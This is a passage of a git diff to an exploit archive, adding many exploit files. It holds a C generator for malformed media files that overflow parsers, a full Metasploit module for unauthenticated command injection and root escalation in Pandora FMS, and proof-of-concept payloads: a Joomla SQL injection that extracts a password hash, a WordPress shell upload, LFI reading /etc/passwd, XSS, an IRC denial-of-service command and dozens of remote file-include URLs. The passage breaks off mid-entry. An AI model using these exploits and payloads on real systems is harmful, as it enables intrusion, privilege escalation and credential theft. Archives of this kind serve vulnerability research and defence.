putxb(p, 0x41414141, 32); + p += putxb(p, 0x41414141, 32); + p += putxb(p, 0x41414141, 32); + } + putxb(psize, (p - psize) + 4, 32); + + } else if(attack == 4) { + p += putxb(p, FORM_TAG, 32); + p += putxb(p, 0, 32); + p += putxb(p, MOVE_TAG, 32); + p += putxb(p, PC_TAG, 32); + p += putxb(p, 0, 32); + p += putxb(p, 0, 32); + p += putxb(p, 0, 32); + p += putxi(p, 0x555556, 32); // this->number_of_shots + p += putxb(p, 0, 32); + p += putxb(p, 0, 32); + p += putxb(p, 0, 32); + for(i = 0; i < 80; i++) { + p += putxb(p, PALT_TAG, 32); + p += putxb(p, PALETTE_CHUNK_SIZE, 32); + p += putcc(p, 13, PALETTE_CHUNK_SIZE); // -> 0x48 + } + + } else if(attack == 5) { + p += gst_ebml_write_element_id(p, EBML_ID_EBML); + p += gst_ebml_write_element_size(p, 8000); // not perfect + p += gst_ebml_write_element_id(p, EBML_ID_DOCTYPE); + p += gst_ebml_write_element_size(p, 0xffffffff); + p += putcc(p, 'A', 8000); + + } else if(attack == 6) { + p += putss(p, "FILM"); + p += 4; + p += putss(p, "1.09"); + p += putxb(p, 0, 32); + p += putxb(p, STAB_TAG, 32); + psize = p; p += 4; + p += putxb(p, 44100, 32); + p += putxb(p, 0x71c71c8, 32); // sizeof(film_sample_t) is +36 bytes + for(i = 0; i < 3000; i++) { + p += putxb(p, 0x41414141, 32); + p += putxb(p, 0x41414141, 32); + p += putxb(p, 0x41414141, 32); + p += putxb(p, 0x41414141, 32); + } + putxb(psize, (p - psize) - 40, 32); + putxb(buff + 4, (p - psize) - 8 - 16, 32); + + } else { + printf("\nError: wrong attack number (%d)\n", attack); + exit(1); + } + + printf("- create file %s\n", fname); + fd = fopen(fname, "wb"); + if(!fd) std_err(); + printf("- write %u bytes\n", p - buff); + fwrite(buff, 1, p - buff, fd); + fclose(fd); + + printf("- done\n"); + return(0); +} + + + +int gst_ebml_write_element_id(u8 *data, u32 id) { // from Gstreamer + int ret, bytes = 4, mask = 0x10; + + while (!(id & (mask << ((bytes - 1) * 8))) && bytes > 0) { + mask <<= 1; + bytes--; + } + + if (bytes == 0) { + bytes = 1; + id = GST_EBML_ID_VOID; + } + + ret = bytes; + while (bytes--) { + data[bytes] = id & 0xff; + id >>= 8; + } + return(ret); +} + + + +int gst_ebml_write_element_size(u8 *data, i64 size) { // from Gstreamer + int ret, bytes = 1, mask = 0x80; + + if (size != GST_EBML_SIZE_UNKNOWN) { + while ((size >> ((bytes - 1) * 8)) >= (mask - 1) && bytes <= 8) { + mask >>= 1; + bytes++; + } + + if (bytes > 8) { + mask = 0x01; + bytes = 8; + size = GST_EBML_SIZE_UNKNOWN; + } + } else { + mask = 0x01; + bytes = 8; + } + + ret = bytes; + while (bytes-- > 0) { + data[bytes] = size & 0xff; + size >>= 8; + if (!bytes) + *data |= mask; + } + return(ret); +} + + + +int putcc(u8 *data, int chr, int len) { + memset(data, chr, len); + return(len); +} + + + +int putss(u8 *data, u8 *str) { + int len; + + len = strlen(str); + memcpy(data, str, len); + return(len); +} + + + +int putxb(u8 *data, u64 num, int bits) { + int i, + bytes; + + bytes = bits >> 3; + for(i = 0; i < bytes; i++) { + data[i] = (num >> ((bytes - 1 - i) << 3)) & 0xff; + } + return(bytes); +} + + + +int putxi(u8 *data, u64 num, int bits) { + int i, + bytes; + + bytes = bits >> 3; + for(i = 0; i < bytes; i++) { + data[i] = (num >> (i << 3)) & 0xff; + } + return(bytes); +} + + + +void std_err(void) { + perror("\nError"); + exit(1); +} + + + diff --git a/platforms/linux/remote/31518.rb b/platforms/linux/remote/31518.rb new file mode 100755 index 000000000..f3e54fc35 --- /dev/null +++ b/platforms/linux/remote/31518.rb @@ -0,0 +1,113 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + + def initialize(info={}) + super(update_info(info, + 'Name' => "Pandora FMS Remote Code Execution", + 'Description' => %q{ + This module exploits a vulnerability found in Pandora FMS 5.0RC1 and lower. + It will leverage an unauthenticated command injection in the Anyterm service on + port 8023. Commands are executed as the user "pandora". In Pandora FMS 4.1 and 5.0RC1 + the user "artica" is not assigned a password by default, which makes it possible to su + to this user from the "pandora" user. The "artica" user has access to sudo without a + password, which makes it possible to escalate privileges to root. However, Pandora FMS 4.0 + and lower force a password for the "artica" user during installation. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'xistence ' # Vulnerability discovery and Metasploit module + ], + 'References' => + [ + ], + 'Payload' => + { + 'BadChars' => "", + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic perl python', + } + }, + 'Platform' => ['unix'], + 'Arch' => ARCH_CMD, + 'Targets' => + [ + ['Pandora 5.0RC1', {}] + ], + 'Privileged' => true, + 'DisclosureDate' => "Jan 29 2014", + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(8023), + OptString.new('TARGETURI', [true, 'The base path to the Pandora instance', '/']), + ], self.class) + end + + def on_new_session(client) + print_status("#{peer} - Trying to escalate privileges to root") + [ + # ignore SIGHUP so the server doesn't kill our root shell + "trap '' HUP", + # Spawn a pty for su/sudo + "python -c 'import pty;pty.spawn(\"/bin/sh\")'", + # Su to the passwordless "artica" account + "su - artica", + # The "artica" use has sudo rights without the need for a + # password, thus gain root priveleges + "sudo -s", + ].each do |command| + vprint_status(command) + client.shell_write(command + "\n") + end + + super + end + + def check + # Check version + print_status("#{peer} - Trying to detect Pandora FMS Remote Gateway") + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "anyterm.html") + }) + + if res && res.code == 200 && res.body.include?("Pandora FMS Remote Gateway") + print_good("#{peer} - Pandora FMS Remote Gateway Detected!") + return Exploit::CheckCode::Detected + end + + return Exploit::CheckCode::Safe + end + + def exploit + print_status("#{peer} - Sending payload") + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, "/anyterm-module"), + 'vars_post' => { + 'a' => "open", + 'p' => "`#{payload.encoded}`" + } + }) + + if !res || res.code != 200 + fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!") + end + end + +end \ No newline at end of file diff --git a/platforms/multiple/dos/31477.txt b/platforms/multiple/dos/31477.txt new file mode 100755 index 000000000..7e312c7da --- /dev/null +++ b/platforms/multiple/dos/31477.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28413/info + +The 'snircd' and 'ircd' daemons are prone to a remote denial-of-service vulnerability because the application fails to properly sanitize user-supplied input. + +Successfully exploiting this issue allows remote attackers to crash the application, denying service to legitimate users. + +This issue affects versions up to and including 'snircd' 1.3.4 and 'ircu' 2.10.12.12. + +/mode nickname i i i i i i i i i i i i i i i r r r r s \ No newline at end of file diff --git a/platforms/osx/remote/31473.html b/platforms/osx/remote/31473.html new file mode 100755 index 000000000..ea1d33105 --- /dev/null +++ b/platforms/osx/remote/31473.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28405/info + +Apple Safari is prone to a content-spoofing vulnerability that allows attackers to populate a vulnerable Safari browser window with arbitrary malicious content. During such an attack, the URL and window title will display the intended site, while the body of the webpage is spoofed. + +Safari 3.1 running on Microsoft Windows is reported vulnerable. + +NOTE: This issue may be related to the vulnerability discussed in BID 24457 (Apple Safari for Windows Window.setTimeout Content Spoofing Vulnerability). + + Safari browser 3.1 (525.13) spoofing by Juan Pablo Lopez Yacubian Recipe 6.6
\ No newline at end of file diff --git a/platforms/php/remote/31479.txt b/platforms/php/remote/31479.txt new file mode 100755 index 000000000..7db82edc7 --- /dev/null +++ b/platforms/php/remote/31479.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/index.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31424.txt b/platforms/php/webapps/31424.txt new file mode 100755 index 000000000..83fcf519f --- /dev/null +++ b/platforms/php/webapps/31424.txt @@ -0,0 +1,27 @@ +# Exploit Title: Wordpress Dandelion Themes Arbitry File Upload +# Google Dork: inurl:/wp-content/themes/dandelion/ +# Date: 31/01/2014 +# Exploit Author: TheBlackMonster (Marouane) +# Vendor Homepage: http://themeforest.net/item/dandelion-powerful-elegant-wordpress-theme/136628 +# Software Link: Not Available +# Version: Web Application +# Tested on: Mozilla, Chrome, Opera -> Windows & Linux +?#?Greetz? : PhantomGhost, Deto Beiber, All Moroccan Hackers. + +We are Moroccans, we are genuis ! + +"@$uploadfile")); +curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); +$postResult = curl_exec($ch); +curl_close($ch); +print "$postResult"; +?> + +File Access : + +http://127.0.0.1/uploads/[years]/[month]/your_shell.php diff --git a/platforms/php/webapps/31458.txt b/platforms/php/webapps/31458.txt new file mode 100755 index 000000000..a64202b4f --- /dev/null +++ b/platforms/php/webapps/31458.txt @@ -0,0 +1,35 @@ +# Exploit: PHP Webcam Video Conference - LFI/XSS +# Date: 06/02/2014 +# Exploit Author: vinicius777 +# Contact: vinicius777 [AT] gmail / @vinicius777_ +# Vendor Homepage: http://www.videowhisper.com/ +# Software Link: http://sourceforge.net/projects/phpwebcamvideoconference +# Solution: Upgrade from to the new version on videowhisper vendor homepage. + + + + +[1] Local File Include - rtmp_login.php + +P0C: http://192.168.1.7/vc_php/rtmp_login.php?s=../../../../../etc/passwd + +[+] rtmp_rlogin.php + +$session = $_GET['s']; + +$filename1 = "uploads/_sessions/$session"; +if (file_exists($filename1)) +{ +echo implode('', file($filename1)); +} +else +{ +echo "VideoWhisper=1&login=0"; +} +?> + + +[2] XSS Reflected + +P0C = http://192.168.1.7/vc_php/vc_logout.php?message=[XSS] + diff --git a/platforms/php/webapps/31459.txt b/platforms/php/webapps/31459.txt new file mode 100755 index 000000000..d4fc40918 --- /dev/null +++ b/platforms/php/webapps/31459.txt @@ -0,0 +1,24 @@ +# Exploit Title: Joomla 3.2.1 sql injection +# Date: 05/02/2014 +# Exploit Author: kiall-9@mail.com +# Vendor Homepage: http://www.joomla.org/ +# Software Link: http://joomlacode.org/gf/download/frsrelease/19007/134333/Joomla_3.2.1-Stable-Full_Package.zip +# Version: 3.2.1 (default installation with Test sample data) +# Tested on: Virtualbox (debian) + apache +POC=> +http://localhost/Joomla_3.2.1/index.php/weblinks-categories?id=\ + +will cause an error: + +1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\)' at line 3 SQL=SELECT `t`.`id` FROM `k59cv_tags` AS t INNER JOIN `k59cv_contentitem_tag_map` AS m ON `m`.`tag_id` = `t`.`id` AND `m`.`type_alias` = 'com_weblinks.categories' AND `m`.`content_item_id` IN ( \) Array ( [type] => 8 [message] => Undefined offset: 0 [file] => /var/www/Joomla_3.2.1/libraries/joomla/filter/input.php [line] => 203 ) + +I modified the original error.php file with this code --- --- in order to obtain something useful. ;-) + +Now i can easily exploit this flaw: + +http://localhost/Joomla_3.2.1/index.php/weblinks-categories?id=0%20%29%20union%20select%20password%20from%20%60k59cv_users%60%20--%20%29 +and obtain the hash: + +1054 Unknown column '$P$D8wDjZpDIF4cEn41o0b4XW5CUrkCOZ1' in 'where clause' SQL=SELECT `m`.`tag_id`,`m`.`core_content_id`,`m`.`content_item_id`,`m`.`type_alias`,COUNT( `tag_id`) AS `count`,`t`.`access`,`t`.`id`,`ct`.`router`,`cc`.`core_title`,`cc`.`core_alias`,`cc`.`core_catid`,`cc`.`core_language` FROM `k59cv_contentitem_tag_map` AS `m` INNER JOIN `k59cv_tags` AS `t` ON m.tag_id = t.id INNER JOIN `k59cv_ucm_content` AS `cc` ON m.core_content_id = cc.core_content_id INNER JOIN `k59cv_content_types` AS `ct` ON m.type_alias = ct.type_alias WHERE `m`.`tag_id` IN ($P$D8wDjZpDIF4cEn41o0b4XW5CUrkCOZ1) AND t.access IN (1,1) AND (`m`.`content_item_id` <> 0 ) union select password from `k59cv_users` -- ) OR `m`.`type_alias` <> 'com_weblinks.categories') AND `cc`.`core_state` = 1 GROUP BY `m`.`core_content_id` ORDER BY `count` DESC LIMIT 0, 5 + +CheerZ> diff --git a/platforms/php/webapps/31467.txt b/platforms/php/webapps/31467.txt new file mode 100755 index 000000000..255dd385f --- /dev/null +++ b/platforms/php/webapps/31467.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28399/info + +phpMyChat is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +phpMyChat 0.14.5 is vulnerable; other versions may also be affected. + +http://www.example.com/chat/setup.php3?Lang=" \ No newline at end of file diff --git a/platforms/php/webapps/31468.txt b/platforms/php/webapps/31468.txt new file mode 100755 index 000000000..c3d688ce9 --- /dev/null +++ b/platforms/php/webapps/31468.txt @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/28400/info + +My Web Doc is prone to multiple authentication-bypass vulnerabilities. + +Attackers can leverage these issues to compromise the application, which could aid in other attacks. + +My Web Doc 2000 Final is vulnerable; other versions may also be affected. + +http://www.example.com/mywebdocadd.php3?x +http://www.example.com/mywebdoccalendaradd.php3?x +http://www.example.com/mywebdoclisting.php3?x +http://www.example.com/mywebdocchangepassword.php3?x +http://www.example.com/mywebdocadduser.php3?x +http://www.example.com/mywebdocuserlisting.php3?x \ No newline at end of file diff --git a/platforms/php/webapps/31469.txt b/platforms/php/webapps/31469.txt new file mode 100755 index 000000000..7e63060a9 --- /dev/null +++ b/platforms/php/webapps/31469.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28401/info + +ooComments is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +ooComments 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/classes/class_admin.php?PathToComment=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31470.txt b/platforms/php/webapps/31470.txt new file mode 100755 index 000000000..1c7febfaa --- /dev/null +++ b/platforms/php/webapps/31470.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28401/info + +ooComments is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +ooComments 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/classes/class_comments.php?PathToComment=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31471.txt b/platforms/php/webapps/31471.txt new file mode 100755 index 000000000..faef27cc8 --- /dev/null +++ b/platforms/php/webapps/31471.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/28402/info + +TinyPortal is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +http://www.example.com/index.php?PHPSESSID="> \ No newline at end of file diff --git a/platforms/php/webapps/31472.txt b/platforms/php/webapps/31472.txt new file mode 100755 index 000000000..82a259268 --- /dev/null +++ b/platforms/php/webapps/31472.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/28403/info + +cPanel is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/frontend/x/manpage.html? \ No newline at end of file diff --git a/platforms/php/webapps/31476.txt b/platforms/php/webapps/31476.txt new file mode 100755 index 000000000..4dd86d411 --- /dev/null +++ b/platforms/php/webapps/31476.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/28412/info + +Efestech E-Kontor is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/?id=-1%20union+select+0,sifre,2,3+from+admin+where+id=1 +http://www.example.com/?id=-1%20union+select+0,firma,2,3+from+admin+where+id=1 \ No newline at end of file diff --git a/platforms/php/webapps/31480.txt b/platforms/php/webapps/31480.txt new file mode 100755 index 000000000..f964058ea --- /dev/null +++ b/platforms/php/webapps/31480.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/locate.php3?DOCUMENT_ROOT=ZoRLu.txt?, \ No newline at end of file diff --git a/platforms/php/webapps/31481.txt b/platforms/php/webapps/31481.txt new file mode 100755 index 000000000..15d3e14a7 --- /dev/null +++ b/platforms/php/webapps/31481.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/search_results.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31482.txt b/platforms/php/webapps/31482.txt new file mode 100755 index 000000000..01e57c145 --- /dev/null +++ b/platforms/php/webapps/31482.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/classifieds/index.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31483.txt b/platforms/php/webapps/31483.txt new file mode 100755 index 000000000..3f2c9ebe5 --- /dev/null +++ b/platforms/php/webapps/31483.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/classifieds/view.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31484.txt b/platforms/php/webapps/31484.txt new file mode 100755 index 000000000..c913b5582 --- /dev/null +++ b/platforms/php/webapps/31484.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlcenter/index.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31485.txt b/platforms/php/webapps/31485.txt new file mode 100755 index 000000000..0908b0726 --- /dev/null +++ b/platforms/php/webapps/31485.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlcenter/manager.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31486.txt b/platforms/php/webapps/31486.txt new file mode 100755 index 000000000..5703f9c55 --- /dev/null +++ b/platforms/php/webapps/31486.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlcenter/pass.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31487.txt b/platforms/php/webapps/31487.txt new file mode 100755 index 000000000..642344350 --- /dev/null +++ b/platforms/php/webapps/31487.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlcenter/remember.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31488.txt b/platforms/php/webapps/31488.txt new file mode 100755 index 000000000..47ddeec10 --- /dev/null +++ b/platforms/php/webapps/31488.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlcenter/sign-up.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31489.txt b/platforms/php/webapps/31489.txt new file mode 100755 index 000000000..b47be866d --- /dev/null +++ b/platforms/php/webapps/31489.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlcenter/update.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31490.txt b/platforms/php/webapps/31490.txt new file mode 100755 index 000000000..036e61437 --- /dev/null +++ b/platforms/php/webapps/31490.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlcenter/userSet.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31491.txt b/platforms/php/webapps/31491.txt new file mode 100755 index 000000000..561ceabdc --- /dev/null +++ b/platforms/php/webapps/31491.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlcenter/verify.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31492.txt b/platforms/php/webapps/31492.txt new file mode 100755 index 000000000..ed3276606 --- /dev/null +++ b/platforms/php/webapps/31492.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/alterCats.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31493.txt b/platforms/php/webapps/31493.txt new file mode 100755 index 000000000..c37230f8d --- /dev/null +++ b/platforms/php/webapps/31493.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/alterFeatured.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31494.txt b/platforms/php/webapps/31494.txt new file mode 100755 index 000000000..a97f06428 --- /dev/null +++ b/platforms/php/webapps/31494.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/alterHomepage.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31495.txt b/platforms/php/webapps/31495.txt new file mode 100755 index 000000000..908f1bacc --- /dev/null +++ b/platforms/php/webapps/31495.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/alterNews.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31496.txt b/platforms/php/webapps/31496.txt new file mode 100755 index 000000000..978474b9b --- /dev/null +++ b/platforms/php/webapps/31496.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/alterTheme.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31497.txt b/platforms/php/webapps/31497.txt new file mode 100755 index 000000000..6aeded045 --- /dev/null +++ b/platforms/php/webapps/31497.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/color_help.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31498.txt b/platforms/php/webapps/31498.txt new file mode 100755 index 000000000..0d8086084 --- /dev/null +++ b/platforms/php/webapps/31498.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/createdb.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31499.txt b/platforms/php/webapps/31499.txt new file mode 100755 index 000000000..6c69e7589 --- /dev/null +++ b/platforms/php/webapps/31499.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/createFeatured.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31500.txt b/platforms/php/webapps/31500.txt new file mode 100755 index 000000000..c0f51e842 --- /dev/null +++ b/platforms/php/webapps/31500.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28417/info + +Quick Classifieds is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +Quick Classifieds 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/QuickSystems_path/controlpannel/createHomepage.php3?DOCUMENT_ROOT=ZoRLu.txt? \ No newline at end of file diff --git a/platforms/php/webapps/31501.txt b/platforms/php/webapps/31501.txt new file mode 100755 index 000000000..c1fb710f0 --- /dev/null +++ b/platforms/php/webapps/31501.txt @@ -0,0 +1,9 @@ +source: 